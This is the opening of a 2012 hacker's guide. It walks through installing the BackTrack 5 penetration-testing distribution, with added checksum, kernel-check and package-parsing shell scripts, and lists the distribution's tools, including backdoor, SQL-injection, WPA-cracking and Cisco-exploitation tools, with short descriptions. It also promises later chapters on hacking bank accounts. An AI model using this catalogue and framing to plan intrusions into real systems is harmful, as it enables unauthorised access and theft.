Comprehensive: Journey of a Hacker 2012 Vol-(I) From Intermediate Hacker To Elite Hacker. By Scryptaxxeler

A guide for those who want to become elite but can't find the right direction.

Disclaimer: This is a work of pure plagiarism. It would be difficult to credit everyone whose work I am going to borrow from. Some parts, however, are my own work, and anyone may copy and distribute them as is. This book gives an insight into the dark world of hackers, and it includes a good deal of information about breaking and breaching cyber crime laws. It is not to be used for illegal purposes; it is intended to let ordinary people and system administrators know where the weakest link lies. Remember: a chain is only as strong as its weakest link.

About: This book is intended to provide information on how to become an elite hacker. It goes well beyond the CEH courses that are provided for script kiddies.

Brief overviews of the included topics:

Volume 1 is the intermediate-level hacker's book on hacking, which covers:
- Metasploit Framework
- Burp Suite, W3AF Framework, etc.
- How bank accounts are hacked
- Social Engineering Toolkit

Volume 2 is the level where the hacker no longer relies on ready-made exploitation tools but writes them himself. It covers:
- Sandbox evasion
- Programming skills for a hacker
- Reversing down to the level of assembly
- Heap spraying, use-after-free, stack overflow
- Deciphering the cookie, and much more

PART-I

The Hacker's Framework

Chapter 1: Setting up a Penetration Testing Edition of Linux
Chapter 2: The Metasploit Framework
Chapter 3: Web Security: The Burp Suite and W3AF
Chapter 4: Social Engineering Tools

Chapter 1: Setting up a Penetration Testing Edition of Linux.

This chapter introduces a penetration-testing distribution of Linux. I will be discussing BackTrack 5 in detail, but you can also look at NodeZero and Ubuntu Pentest Edition.

Let's begin then.

Backtrack:

BackTrack is intended for all audiences, from the most savvy security professionals to newcomers to the information security field. BackTrack offers a quick and easy way to find and update the largest collection of security tools to date. Our community of users ranges from skilled penetration testers in the information security field, government entities and information technology, to security enthusiasts and individuals new to the security community.

Feedback from all industries and skill levels allows us to truly develop a solution that is tailored towards everyone and far exceeds anything ever developed both commercially and freely available. The project is funded by Offensive Security. Whether you’re hacking wireless, exploiting servers, performing a web application assessment, learning, or social-engineering a client, BackTrack is the one-stop-shop for all of your security needs.

BackTrack Clean Hard Drive Install

This method of installation is the simplest available. The assumption is that the whole hard drive is going to be used for BackTrack.

1. Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.

2. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.

3. Select your geographical location and click “forward”. Same for the Keyboard layout.

4. The next screen allows you to configure the partitioning layout. The assumption is that we are deleting the whole drive and installing BackTrack on it.

5. Accept the installation summary and click "Install". Allow the installation to run and complete. Restart when done.

6. Log into BackTrack with the default username and password root / toor. Change the root password immediately (run "passwd"): the default is public knowledge, and this box will soon hold client data and working exploits.

7. Fix the framebuffer splash by typing "fix-splash" (or "fix-splash800" if you want an 800x600 framebuffer), then reboot.

BackTrack Dual Boot Install with Windows (Tested on Win 7)

This method of installation is the simplest available for a dual boot. The assumption is that you have a Windows installation taking up all the space on your drive, and you would like to resize and repartition the drive to allow a BackTrack install alongside Windows. BACK UP YOUR WINDOWS INSTALLATION FIRST.

1. Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.

2. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.

3. Select your geographical location and click “forward”. Same for the Keyboard layout.

4. The next screen allows you to configure the partitioning layout. The assumption is that we are resizing the Windows 7 partition and installing BackTrack in the newly made space.

5. Accept the installation summary and click "Install". Allow the installation to run and complete. Restart when done.

6. Grub should allow you to boot both into BackTrack and Windows.

7. Log into BackTrack with the default username and password root / toor. Change the root password immediately (run "passwd"); the default is public knowledge.

8. Fix the framebuffer splash by typing "fix-splash" (or "fix-splash800" if you want an 800x600 framebuffer), then reboot.

BackTrack Live USB Install

This method of getting a live install onto a USB drive is the simplest available, using Unetbootin. Note that the USB drive will be formatted and its contents erased.

1. Plug in your USB Drive (Minimum USB Drive capacity 2 GB)

2. Format the USB drive to FAT32

3. Download Unetbootin from http://unetbootin.sourceforge.net/

4. Start Unetbootin and select diskimage (use the backtrack-final ISO)

5. Select your USB drive and click "OK" to create a bootable BackTrack USB drive.

6. Log into BackTrack with the default username and password root / toor.
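Whichever of the three install methods you use, the one step none of them mentions is checking that the ISO you downloaded is the ISO the project published. The script below is an added example, not from the BackTrack site or from this book: it verifies a SHA-256 sum before anything is written, refuses to write to a device that is currently mounted, and, as an alternative to Unetbootin, copies the ISO to the whole device with dd. The hash and the /proc/mounts contents used in the demonstration at the bottom are constructed from a throw-away temp file, not the real backtrack-final ISO. If a distributor only publishes MD5 or SHA-1 sums, substitute md5sum or sha1sum; a weaker hash still catches a corrupt download but gives little assurance against a tampered one.

```shell
#!/bin/sh
# Added example (not part of the BackTrack docs or this book). Assumes GNU
# coreutils (sha256sum, dd) as found on BackTrack / Ubuntu.

# verify_iso FILE EXPECTED_SHA256
# Returns 0 when FILE's SHA-256 matches EXPECTED_SHA256 (case-insensitive),
# 1 when it does not or FILE is unreadable. Prints nothing.
verify_iso() {
    _file=$1
    _expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ -r "$_file" ] || return 1
    _actual=$(sha256sum "$_file" | cut -d' ' -f1)
    [ "$_actual" = "$_expected" ]
}

# device_is_mounted DEVICE [MOUNTS_FILE]
# Returns 0 if DEVICE or any partition on it (/dev/sdb matches /dev/sdb1)
# appears in MOUNTS_FILE, which defaults to /proc/mounts.
device_is_mounted() {
    _dev=$1
    _mounts=${2:-/proc/mounts}
    grep -q "^$_dev" "$_mounts" 2>/dev/null
}

# write_iso_to_usb ISO DEVICE EXPECTED_SHA256
# dd-based alternative to Unetbootin. Writes to the whole device, never a
# partition. Picking the wrong DEVICE destroys that disk: nothing here
# auto-detects the stick, read the output of `lsblk` yourself first.
write_iso_to_usb() {
    _iso=$1; _dev=$2; _sum=$3
    if ! verify_iso "$_iso" "$_sum"; then
        echo "checksum mismatch for $_iso, refusing to write" >&2; return 1
    fi
    if device_is_mounted "$_dev"; then
        echo "$_dev is mounted, refusing to write" >&2; return 1
    fi
    if [ ! -b "$_dev" ]; then
        echo "$_dev is not a block device" >&2; return 1
    fi
    dd if="$_iso" of="$_dev" bs=4M && sync
}

# Demonstration on a constructed file (stands in for the ISO).
DEMO_ISO=$(mktemp)
printf 'constructed stand-in for backtrack-final.iso\n' > "$DEMO_ISO"
DEMO_SUM=$(sha256sum "$DEMO_ISO" | cut -d' ' -f1)
verify_iso "$DEMO_ISO" "$DEMO_SUM" && echo "demo: hash verified"
verify_iso "$DEMO_ISO" "0000000000000000000000000000000000000000000000000000000000000000" \
    || echo "demo: wrong hash rejected"
rm -f "$DEMO_ISO"
```

On a real install the call is write_iso_to_usb backtrack-final.iso /dev/sdX <sum from the download page>; the ordering matters, because the hash check and the mount check both run before dd touches the device.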

Install BackTrack in VMWare.

1. Follow the basic install instructions above to get BackTrack installed in a VMware virtual machine.

2. Log into BackTrack. To install the VMware drivers, the kernel source and headers need to be in place. These steps were written for the BackTrack 4 final release, where the kernel (denoted by {version} below) is already configured and ready; the version string will differ on BackTrack 5, so check it with "uname -r" before substituting it. In some cases you might need to make sure you have the latest kernel sources by typing:

    apt-get update
    apt-get install linux-source
    cd /usr/src
    tar jxpf linux-source-{version}.tar.bz2
    ln -s linux-source-{version} linux
    cd linux
    zcat /proc/config.gz > .config
    make scripts
    make prepare

The "zcat /proc/config.gz" step only works if the running kernel exports its configuration there; if that file does not exist, copy /boot/config-{version} to .config instead.

3. Now that your kernel sources and headers are in place, choose "Install VMware Tools" for this guest VM from the VMware menu.

4. Mount the VMware Tools virtual CD, copy the VMware Tools package over and run the installer (the CD device name varies between VMs; check with "ls /dev/cdrom*"):

    mount /dev/cdrom3 /mnt/cdrom
    cp /mnt/cdrom/VMwareTools-{version}.tar.gz /tmp/
    cd /tmp/
    tar zxpf VMwareTools-{version}.tar.gz
    cd vmware-tools-distrib
    ./vmware-install.pl

5. Complete the VMware Tools installation as required. Run "fix-splash" to bring back the green framebuffer console, then reboot.
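The VMware Tools installer compiles its kernel modules against the tree behind /usr/src/linux, and when step 2 was skipped or half-done the failure shows up late and cryptically. The script below is an added example, not part of the BackTrack documentation quoted above: it checks the tree for each artefact the procedure produces (the unpacked source, its Makefile, the .config written from /proc/config.gz) and names the missing step, and it reads the version out of the tree's Makefile so you can compare it with "uname -r". The temp tree at the bottom, including its 2.6.38 version numbers, is constructed for the demonstration and does not describe any particular BackTrack release.

```shell
#!/bin/sh
# Added example (not from the BackTrack docs). Assumes a kernel source tree
# laid out like the one step 2 unpacks: top-level Makefile with
# VERSION/PATCHLEVEL/SUBLEVEL lines, and a .config once configured.

# kernel_prep_status SRC_DIR
# Prints "ok" and returns 0 when SRC_DIR looks like a configured kernel tree;
# otherwise prints which step of the procedure is still missing, returns 1.
kernel_prep_status() {
    _src=$1
    if [ ! -d "$_src" ]; then
        echo "missing: source tree $_src (apt-get install linux-source, unpack it, ln -s it to /usr/src/linux)"
        return 1
    fi
    if [ ! -f "$_src/Makefile" ]; then
        echo "missing: $_src/Makefile ($_src is not a kernel source tree)"
        return 1
    fi
    if [ ! -f "$_src/.config" ]; then
        echo "missing: $_src/.config (zcat /proc/config.gz > .config, or copy /boot/config-<version>)"
        return 1
    fi
    echo ok
    return 0
}

# kernel_source_version SRC_DIR
# Reads VERSION, PATCHLEVEL and SUBLEVEL from the tree's top-level Makefile
# and prints them as X.Y.Z; compare the result with `uname -r` before building.
# Prints nothing if any of the three lines is absent.
kernel_source_version() {
    awk -F'[ =]+' '
        $1 == "VERSION"    { v = $2 }
        $1 == "PATCHLEVEL" { p = $2 }
        $1 == "SUBLEVEL"   { s = $2 }
        END { if (v != "" && p != "" && s != "") printf "%s.%s.%s\n", v, p, s }
    ' "$1/Makefile"
}

# Constructed demonstration tree standing in for /usr/src/linux.
DEMO=$(mktemp -d)
printf 'VERSION = 2\nPATCHLEVEL = 6\nSUBLEVEL = 38\nEXTRAVERSION =\n' > "$DEMO/Makefile"
kernel_prep_status "$DEMO" || true        # reports the missing .config
: > "$DEMO/.config"
kernel_prep_status "$DEMO" || true        # ok
kernel_source_version "$DEMO"             # 2.6.38 (constructed numbers)
rm -rf "$DEMO"
```

On a live BackTrack box run kernel_prep_status /usr/src/linux and compare kernel_source_version /usr/src/linux against "uname -r"; a mismatch means vmware-install.pl will build modules for a kernel you are not running.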

Source: the BackTrack official site.

Installation done. Now let's get some understanding of what BackTrack offers:

The screenshot (not reproduced here) shows where the Network Exploitation Tools live in the BackTrack 5 menu, for new users. As you can see, BackTrack has already grouped the essential tools for you.

See the other screenshot. It would take 1000 pages to give screenshots for every tool in BackTrack, so instead I give you the list and you can use Google to read up on each tool. Isn't that cool?

The list you are about to see will blow your head off. I include it for reference purposes; you can skip past it to around page 100. The best way to learn about a tool is a search engine, which gives you the best access to more knowledge of the tool.

Thanks to ZitsTif for the list that he uploaded to his site.

#############################NOTE##########################################
Date: Fri Jul 15 16:42:13 EDT 2011
Version: Backtrack 5 - gnome - 32bit

A tool I installed that doesn't come with Backtrack 5 by default: sysv-rc-conf

Command I ran before running dpkg --list > toolslist.txt:

    sudo apt-get update && sudo apt-get upgrade -y && sudo msfupdate

I also installed VirtualBox Guest Host Additions.
############################################################################
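Rather than reading a dpkg listing by eye, it pays to parse it: the version suffix tells you which packages BackTrack added on top of Ubuntu (they carry a "-btN" build number, for example framework3 3.7.0-bt1), and the status column tells you what is not actually installed even though it appears in the list (the apparmor and apparmor-utils entries below are "rc", meaning removed with only config files left, so AppArmor is not confining anything on this build). The script below is an added example, not ZitsTif's or the book's; its SAMPLE is constructed from a handful of lines taken from the list that follows, and on a live system you would pipe the real "dpkg --list" into the same functions.

```shell
#!/bin/sh
# Added example (not from the book or ZitsTif's notes). Assumes the column
# layout of `dpkg --list`: status, name, version, description, with a few
# header lines that do not start with a two-letter status.

# Constructed sample, taken from entries in the list on this page.
SAMPLE='||/ Name Version Description
ii  0trace  1.0-bt4  0trace is a traceroute tool
ii  adduser  3.112ubuntu1  add and remove users and groups
rc  apparmor  2.5.1-0ubuntu0.10.04.3  User-space parser utility for AppArmor
ii  framework3  3.7.0-bt1  Metasploit Exploitation Framework
ii  burpsuite  1.4-bt0  integrated platform for performing security testing'

# dpkg_rows: read dpkg --list output on stdin, drop the header lines (first
# field is not a two-letter status, optionally followed by an error flag),
# and emit "status name version" triples.
dpkg_rows() {
    awk 'NF >= 3 && $1 ~ /^[a-zA-Z][a-zA-Z][A-Z]?$/ { print $1, $2, $3 }'
}

# bt_packages: name and version of each installed package carrying a
# BackTrack build suffix ("-bt" followed by digits at the end of the version).
bt_packages() {
    dpkg_rows | awk '$1 == "ii" && $3 ~ /-bt[0-9]+$/ { print $2, $3 }'
}

# odd_status: every entry whose status is not "ii" (fully installed), which
# is where removed security components such as AppArmor show up as "rc".
odd_status() {
    dpkg_rows | awk '$1 != "ii" { print $1, $2 }'
}

# count_bt: number of BackTrack-suffixed packages in the listing on stdin.
count_bt() {
    bt_packages | wc -l | tr -d ' '
}

# Demonstration against the constructed sample. On a real box:
#   dpkg --list | bt_packages
#   dpkg --list | odd_status
printf '%s\n' "$SAMPLE" | bt_packages
printf '%s\n' "$SAMPLE" | odd_status
```

The "-bt" filter is a quick inventory of what the distribution layered on top of Ubuntu 10.04 and therefore what you, not Ubuntu's security updates, are responsible for keeping current; the status filter is the one to run before assuming a hardening component listed by dpkg is actually active.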

||/  Name  Version  Description
ii  0trace  1.0-bt4  0trace is a traceroute tool that can be run within an existing, open TCP connection - therefore bypassing some types of stateful packet filters with ease.
ii  3proxy  0.6.1-bt2  3APA3A 3proxy tiny proxy server
ii  ace  1.10-bt2  ACE (Automated Corporate Enumerator) is a simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order t
ii  adduser  3.112ubuntu1  add and remove users and groups
ii  admsnmp  0.1-bt3  SNMP audit scanner.
ii  afflib  3.6.10-bt1  An open source implementation of AFF written in C.
ii  air  2.0.0-bt2  AIR is a GUI front-end to dd/dc3dd designed for easily creating forensic images.
ii  aircrack-ng  1.1-bt9  Aircrack-ng wireless exploitation and enumeration suite
ii  alacarte  0.13.1-0ubuntu1  easy GNOME menu editing tool
ii  alsa-base  1.0.22.1+dfsg-0ubuntu3  ALSA driver configuration files
ii  alsa-tools  1.0.22-0ubuntu1  Console based ALSA utilities for specific hardware
ii  alsa-utils  1.0.22-0ubuntu5  ALSA utilities
ii  amap  5.2-bt4  Amap is a next-generation tool for assistingnetwork penetration testing. It performs fast and reliable application protocol detection, independant on the
ii  apache2  2.2.14-5ubuntu8.4  Apache HTTP Server metapackage
ii  apache2-mpm-prefork  2.2.14-5ubuntu8.4  Apache HTTP Server - traditional non-threaded model
ii  apache2-utils  2.2.14-5ubuntu8.4  utility programs for webservers
ii  apache2.2-bin  2.2.14-5ubuntu8.4  Apache HTTP Server common binary files
ii  apache2.2-common  2.2.14-5ubuntu8.4  Apache HTTP Server common files
ii  app-install-data  0.10.04.7  Ubuntu applications (data files)
rc  apparmor  2.5.1-0ubuntu0.10.04.3  User-space parser utility for AppArmor
rc  apparmor-utils  2.5.1-0ubuntu0.10.04.3  Utilities for controlling AppArmor
ii  apport  1.13.3-0ubuntu2  automatically generate crash reports for debugging
ii  apport-symptoms  0.9  symptom scripts for apport
ii  apt  0.7.25.3ubuntu9.4  Advanced front-end for dpkg
ii  apt-transport-https  0.7.25.3ubuntu9.4  APT https transport
ii  apt-utils  0.7.25.3ubuntu9.4  APT utility programs
ii  aptitude  0.4.11.11-1ubuntu10  terminal-based package manager
ii  arping  2.09-bt0  Broadcasts a who-has ARP packet on the network and prints answers.
ii  asleap  2.2-bt1  Demonstrates a serious deficiency in proprietary Cisco LEAP networks.
ii  asp-auditor  2.2-bt2  Look for common misconfigurations and information leaks in ASP.NET applications.
ii  aspell  0.60.6-3ubuntu1  GNU Aspell spell-checker
ii  aspell-en  6.0-0-5.1ubuntu3  English dictionary for GNU Aspell
ii  at  3.1.11-1ubuntu5.1  Delayed job execution and batch processing
ii  autoconf  2.65-3ubuntu1  automatic configure script builder
ii  automake  1:1.11.1-1  A tool for generating GNU Standards-compliant Makefiles
ii  autopsy  2.24-bt0  A graphical interface to TSK.
ii  autoscan  1.50-bt0  A network scanner (discovering and managing application).
ii  autotools-dev  20090611.1  Update infrastructure for config.{guess,sub} files
ii  avahi-daemon  0.6.25-1ubuntu6.2  Avahi mDNS/DNS-SD daemon
ii  axel  2.4-1  light download accelerator - console version
ii  backtrack-bash-profile  1.0-bt2  bash profile and bashrc files
ii  backtrack-bootsplash  1.0-bt2  BackTrack bootsplash
ii  backtrack-gnome-essential  1.5-bt3  Gnome menu and themes for BackTrack
ii  backtrack-menu-icons  1.5-bt3  BackTrack Menu Icons
ii  backtrack-utils  1.1-bt0  Small bash scripts and utilities
ii  backtrack-wallpapers  1.1-bt0  BackTrack Wallpapers
ii  base-files  5.0.0ubuntu20.10.04.3  Debian base system miscellaneous files
ii  base-passwd  3.5.22  Debian base system master password and group files
ii  bash  4.1-2ubuntu3  The GNU Bourne Again SHell
ii  bash-completion  1:1.1-3ubuntu2  programmable completion for the bash shell
ii  bc  1.06.95-2  The GNU bc arbitrary precision calculator language
ii  bed  0.5-bt1  BED is a program which is designed to check daemons for potential buffer overflows, format strings et. al.
ii  beef  0.4.0.0-bt1  BeEF, the Browser Exploitation Framework is a professional security tool provided for lawful research and testing purposes. It allows the experienced pene
ii  beef-ng  0.4.2.7-bt1  The Browser Exploitation Framework (BeEF) is a powerful professional security tool. BeEF is pioneering techniques that provide the experienced penetration
ii  bind9-host  1:9.7.0.dfsg.P1-1ubuntu0.1  Version of 'host' bundled with BIND 9.X
ii  binfmt-support  1.2.18  Support for extra binary formats
ii  binutils  2.20.1-3ubuntu7.1  The GNU assembler, linker and binary utilities
ii  bison  1:2.4.1.dfsg-3  A parser generator that is compatible with YACC
ii  bkhive  1.1.1-1  Dump the syskey bootkey from a Windows NT/2K/XP system hive
ii  blindelephant  1.0-bt3  Blind Elephant is an open-source generic web application fingerprinter that produces results by examining a small set of static files.
ii  blt  2.4z-4.2  the BLT extension library for Tcl/Tk - run-time package
ii  bluediving  0.9-bt1  Bluediving is a Bluetooth penetration testing suite.
ii  bluemaho  090417-bt0  BlueMaho is GUI-shell (interface) for suite of tools for testing security of bluetooth devices. It is freeware, opensource, written on python, uses wxPyho
ii  bluetooth  4.60-0ubuntu8  Bluetooth support
ii  bluez  4.91-bt0  BlueZ is official Linux Bluetooth protocol stack. It is an Open Source project distributed under GNU General Public License (GPL). BlueZ kernel is part of
ii  bluez-alsa  4.60-0ubuntu8  Bluetooth audio support
ii  bluez-cups  4.60-0ubuntu8  Bluetooth printer driver for CUPS
ii  bluez-gstreamer  4.60-0ubuntu8  Bluetooth GStreamer support
ii  bluez-hcidump  1.42-1build1  Analyses Bluetooth HCI packets
ii  bluez-utils  4.60-0ubuntu8  Transitional package
ii  bogl-bterm  0.1.18-3ubuntu4  Ben's Own Graphics Library - graphical terminal
ii  braa  0.82-bt2  Braa is a tool for making SNMP queries.
ii  bridge-utils  1.4-5ubuntu2  Utilities for configuring the Linux Ethernet bridge
ii  bsdmainutils  8.0.1ubuntu1  collection of more utilities from FreeBSD
ii  bsdutils  1:2.17.2-0ubuntu1.10.04.2  Basic utilities from 4.4BSD-Lite
ii  bt-system-menu-icons  1.0-bt1  BackTrack system menu icons
ii  btscanner  2.1-bt0  btscanner is a tool designed specifically to extract as much information as possible from a Bluetooth device without the requirement to pair. A detailed i
ii  build-essential  11.4build1  Informational list of build-essential packages
ii  bulk-extractor  0.7.18-bt0  A C++ program that scans a disk image (or any other file) and extracts useful information.
ii  burpsuite  1.4-bt0  integrated platform for performing security testing of web applications
ii  busybox-initramfs  1:1.13.3-1ubuntu11  Standalone shell setup for initramfs
ii  busybox-static  1:1.13.3-1ubuntu11  Standalone rescue shell with tons of builtin utilities
ii  byobu  2.68-0ubuntu1.1  a set of useful profiles and a profile-switcher for GNU screen
ii  bzip2  1.0.5-4ubuntu0.1  high-quality block-sorting file compressor - utilities
ii  ca-certificates  20090814  Common CA certificates
ii  ca-certificates-java  20100406ubuntu1  Common CA certificates (JKS keystore)
ii  cabextract  1.2-3+lenny1build0.10.04.1  a program to extract Microsoft Cabinet files
ii  capplets-data  1:2.30.1-0ubuntu1  configuration applets for GNOME - data files
ii  cewl  3.0-bt6  CeWL, the Custom Word List generator.
ii  chkrootkit  0.49-bt0  A tool to locally check for signs of a rootkit.
ii  100627-bt0  The Offline NT Password Editor
ii  cisco-auditing-tool  1.0-bt1  Perl script which scans cisco routers for common vulnerabilities.
ii  cisco-global-exploiter  13-bt1  Cisco Global Exploiter (CGE), is an advanced, simple and fast security testing tool.
ii  cisco-ocs  0.1-bt3  Mass cisco scanner
ii  ciscos  1.3-bt1  Cisco Scanner will scan a range of IP address for Cisco routers that havn't changed their default password of "cisco".
ii  cmospwd  5.0-bt0  Decrypts password stored in cmos used to access BIOS SETUP.
ii  cms-explorer  1.0-bt2  CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running.
ii  command-not-found  0.2.40ubuntu5  Suggest installation of packages in interactive bash sessions
ii  command-not-found-data  0.2.40ubuntu5  Set of data files for command-not-found.
ii  complemento  0.7.6-bt3  Complemento is a collection of tools for pentester: LetDown is a powerful tcp flooder ReverseRaider is a domain scanner that use wordlist scanning or reve
ii  console-setup  1.34ubuntu15  console font and keymap setup program
ii  console-terminus  4.30-2  Fixed-width fonts for fast reading on the Linux console
ii  consolekit  0.4.1-3ubuntu2  framework for defining and tracking users, sessions and seats
ii  copy-router-config  4.0-bt3  Copy Cisco Router config - Using SNMP.
ii  coreutils  7.4-2ubuntu3  The GNU core utilities
ii  cowpatty  4.3-bt0  coWPAtty - Attacking WPA/WPA2-PSK Exchanges
ii  cpio  2.10-1ubuntu2  GNU cpio -- a program to manage archives of files
ii  cpp  4:4.4.3-1ubuntu1  The GNU C preprocessor (cpp)
ii  cpp-4.4  4.4.3-4ubuntu5  The GNU C preprocessor
ii  cpu-checker  0.1-0ubuntu2  tools to help evaluate certain CPU (or BIOS) features
ii  cron  3.0pl1-106ubuntu5  process scheduling daemon
ii  cryptcat  1.2.1-bt2  Cryptcat is the standard netcat enhanced with twofish encryption.
ii  cryptsetup  2:1.1.0~rc2-1ubuntu13  configures encrypted block devices
ii  cupp  3.1-bt0  Common User Passwords Profiler
ii  cups  1.4.3-1ubuntu1.4  Common UNIX Printing System(tm) - server
ii  cups-bsd  1.4.3-1ubuntu1.4  Common UNIX Printing System(tm) - BSD commands
ii  cups-client  1.4.3-1ubuntu1.4  Common UNIX Printing System(tm) - client programs (SysV)
ii  cups-common  1.4.3-1ubuntu1.4  Common UNIX Printing System(tm) - common files
ii  cups-driver-gutenprint  5.2.5-0ubuntu1.1  printer drivers for CUPS
ii  curl  7.19.7-1ubuntu1  Get a file from an HTTP, HTTPS or FTP server
ii  cve  1.0-bt1  Firefox link to Mitre-CVE.
ii  cvs  1:1.12.13-12ubuntu1  Concurrent Versions System
ii  cymothoa  1alpha-bt0  Cymothoa is a stealth backdooring tool, that inject backdoor's shellcode into an existing process.
ii  darkmysqli  1.0-bt2  Multi-Purpose MySQL Injection Tool.
ii  dash  0.5.5.1-3ubuntu2  POSIX-compliant shell
ii  dbus  1.2.16-2ubuntu4.2  simple interprocess messaging system
ii  dbus-x11  1.2.16-2ubuntu4.2  simple interprocess messaging system (X11 deps)
ii  dc3dd  7.0.0-bt0  A patched version of GNU dd to include a number of features useful for computer forensics.
ii  dcfldd  1.3.4.1-2  enhanced version of dd for forensics and security
ii  ddrescue  1.14-bt0  Like dd, dd_rescue does copy data from one file or block device to another.
ii  debconf  1.5.28ubuntu4  Debian configuration management system
ii  debconf-i18n  1.5.28ubuntu4  full internationalization support for debconf
ii  debianutils  3.2.2  Miscellaneous utilities specific to Debian
ii  default-jre  1.6-34  Standard Java or Java compatible Runtime
ii  default-jre-headless  1.6-34  Standard Java or Java compatible Runtime (headless)
ii  defoma  0.11.10-4ubuntu1  Debian Font Manager -- automatic font configuration framework
ii  desktop-file-utils  0.16-0ubuntu2  Utilities for .desktop files
ii  dhcp3-client  3.1.3-2ubuntu3.2  DHCP client
ii  dhcp3-common  3.1.3-2ubuntu3.2  common files used by all the dhcp3* packages
ii  dialog  1.1-20080819-1  Displays user-friendly dialog boxes from shell scripts
ii  dictionaries-common  1.4.0ubuntu2  Common utilities for spelling dictionary tools
ii  diffutils  1:2.8.1-18  File comparison utilities
ii  dirbuster  0.12-bt2  DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of wh
ii  discover  2.1.2-3  hardware identification system
ii  discover-data  2.2009.12.19  Data lists for Discover hardware detection system
ii  discover1  2.1.2-3  transitional package
ii  disktype  9-1  detection of content format of a disk or disk image
ii  dmidecode  2.9-1.2  Dump Desktop Management Interface data
ii  dmitry  1.3a-bt2  DMitry has the ability to gather as much information as possible about a host.
ii  dmraid  1.0.0.rc16-3ubuntu2  Device-Mapper RAID support tool
ii  dmsetup  2:1.02.39-1ubuntu4.1  The Linux Kernel Device Mapper userspace library
ii  dnet-common  2.49ubuntu1  Base package for Linux DECnet
ii  dns2tcp  0.5.2-bt1  Dns2tcp is a tool for relaying TCP connections over DNS.
ii  dnsenum  1.2.2-bt0  dnsenum script for enumerating DNS servers
ii  dnsmap  0.30-bt3  dnsmap is mainly meant to be used by pentesters during the information gathering/enumeration phase of infrastructure security assessments.
ii  dnsrecon  0.3-bt2  DNS Enumeration Script
ii  dnstracer  1.9-bt2  Dnstracer determines where a given Domain Name Server (DNS) gets its information from, and follows the chain of DNS servers back to the servers which know
ii  dnsutils  1:9.7.0.dfsg.P1-1ubuntu0.1  Clients provided with BIND
ii  dnswalk  2.0.2-bt1  dnswalk is a DNS debugger. It performs zone transfers of specifieddomains, and checks the database in numerous ways for internalconsistency, as well as ac
ii  docbook-xml  4.5-7  standard XML documentation system for software and systems
ii  dos2unix  5.0-bt0  Includes utilities to convert text files with DOS or Mac line endings to Unix line endings.
ii  dosfstools  3.0.7-1  utilities for making and checking MS-DOS FAT filesystems
ii  dpkg  1.15.5.6ubuntu4.5  Debian package management system
ii  dpkg-dev  1.15.5.6ubuntu4.5  Debian package development tools
ii  dradis  2.7.0-bt3  Dradis is an open source framework to enable effective information sharing, specially during security assessments.
ii  driftnet  0.1.6-bt2  A program which listens to network traffic and picks out images.
ii  dsniff  2.4b1-bt1  A collection of tools for network auditing and penetration testing.
ii  e2fslibs  1.41.11-1ubuntu2.1  ext2/ext3/ext4 file system libraries
ii  e2fsprogs  1.41.11-1ubuntu2.1  ext2/ext3/ext4 file system utilities
ii  eapmd5pass  1.4-bt0  An implementation of an offline dictionary attack against the EAP-MD5 protocol.
ii  ecryptfs-utils  83-0ubuntu3.1  ecryptfs cryptographic filesystem (utilities)
ii  ed  1.4-1build1  The classic UNIX line editor
ii  eject  2.1.5+deb1+cvs20081104-7  ejects CDs and operates CD-Changers under Linux
ii  enumiax  1.0-bt3  enumIAX is an Inter Asterisk Exchange version 2 (IAX2) protocol username brute-force enumerator. enumIAX may operate in two distinct modes; Sequential Use
ii  eog  2.30.0-0ubuntu1  Eye of GNOME graphics viewer program
ii  esound-clients  0.2.41-6ubuntu1  Enlightened Sound Daemon - clients
ii  esound-common  0.2.41-6ubuntu1  Enlightened Sound Daemon - Common files
ii  eterm  0.9.5-2ubuntu1  Enlightened Terminal Emulator
ii  ethtool  6+20091202-1  display or change Ethernet device settings
ii  ettercap-common  1:0.7.3-1.4ubuntu1  Common support files and plugins for ettercap
ii  ettercap-desktop  0.7.3-bt2  Multipurpose sniffer/interceptor/logger for switched LAN.
ii  ettercap-gtk  1:0.7.3-1.4ubuntu1  Multipurpose sniffer/interceptor/logger for switched LAN
ii  evolution-data-server  2.28.3.1-0ubuntu6  evolution database backend server
ii  evolution-data-server-common  2.28.3.1-0ubuntu6  architecture independent files for Evolution Data Server
ii  evtparse.pl  1.0-bt0  Script to parse Windows 2000/XP/2003 Event Log files.
ii  ewf-tools  20100119-1  collection of tools for reading and writing EWF files
ii  ewfacquire  20100119-bt1  Use ewfacquire to acquire data from a file or device and store it in the EWF format.
ii  exif  0.6.19-1  command-line utility to show EXIF information in JPEG files
ii  exiftool  8.56-bt0  ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of fil
ii  exiv2  0.19-1  EXIF/IPTC metadata manipulation tool
ii  expat  2.0.1-7ubuntu1  XML parsing C library - example application
ii  exploitdb  2.0-bt0  A SVN archive of the exploit-db.
ii  extract  0.5.23+dfsg-4build1  displays meta-data from files of arbitrary type
ii  fakeroot  1.14.4-1ubuntu1  Gives a fake root environment
ii  fancontrol  1:3.1.2-2  utilities to read temperature/voltage/fan sensors
ii  farpd  0.2-10  Fake ARP user space daemon
ii  fasttrack  4.0.1-bt1  Fast-Track is an exploitation framework used to automated penetration testing efforts.
ii  fatback  1.3-bt2  A *nix tool for recovering files from FAT file systems.
ii  fcrackzip  1.0-bt1  fcrackzip is a zip password cracker, similar to fzc, zipcrack and others.
ii  festival  1.96~beta-10ubuntu1  General multi-lingual speech synthesis system
ii  festlex-cmu  1.4.0-6  CMU dictionary for Festival
ii  festlex-poslex  1.4.0-5  Part of speech lexicons and ngram from English
ii  festvox-kallpc16k  1.4.0-5  American English male speaker for festival, 16khz sample rate
ii  fierce  0.9.9-bt4  Fierce is a PERL script that quickly scans domains.
ii  fiked  0.0.5-bt0  FakeIKEd, or fiked for short, is a fake IKE daemon supporting just enough of the standards and Cisco extensions to attack commonly found insecure Cisco VP
ii  file  5.03-5ubuntu1  Determines file type using "magic" numbers
ii  fimap  0.8.1-bt2  fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps.
ii  findutils  4.4.2-1ubuntu1  utilities for finding files--find, xargs
